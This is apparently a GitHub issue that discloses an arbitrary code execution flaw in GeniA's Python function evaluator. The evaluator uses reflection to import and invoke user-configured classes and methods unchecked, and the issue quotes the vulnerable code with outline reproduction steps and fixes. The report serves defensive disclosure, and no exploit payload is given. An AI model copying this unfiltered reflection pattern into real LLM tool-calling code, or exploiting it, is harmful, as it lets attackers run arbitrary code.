-
Notifications
You must be signed in to change notification settings - Fork 85
Open
Description
Problem Description
In the file GeniA/genia/llm_function/python_function.py
, the evaluate method directly executes user-configured Python classes and methods via reflection, without any filtering or security checks.
Risk Analysis
- Arbitrary Code Execution: An attacker could execute arbitrary Python code through a specially crafted function_config parameter.
- Privilege Escalation: It might be possible to bypass system privilege restrictions and perform dangerous operations.
- Data Leakage: Sensitive data could be accessed or modified.
Steps to Reproduce
- Configure a Python class containing a malicious method.
- Pass the configuration of this class through the LLM interface.
- Observe the method being executed unconditionally.
Suggested Fixes
- Implement a method allowlist mechanism.
- Add a privilege checking layer.
- Strictly validate input parameters.
- Consider a sandboxed execution environment.
Relevant Code
def evaluate(self, function_config: dict, parameters: dict) -> Any:
try:
fq_class_name = function_config.get("class")
module_name_str, _, class_name = fq_class_name.rpartition(".")
module = importlib.import_module(module_name_str)
# class_name = self.sanitize_input(class_name)
class_obj = getattr(module, class_name)
if class_obj:
instance = class_obj() # Instantiate the class
method = getattr(instance, function_config.get("method")) # Get the method object
return str(method(**parameters)) # Invoke the method
else:
self.logger.error("Class %s not found.", class_name)
raise Exception("function config error: {}".format(function_config))
except Exception as e:
error_str = "{}: {}".format(type(e).__name__, str(e))
self.logger.exception(error_str)
return error_str
Metadata
Metadata
Assignees
Labels
No labels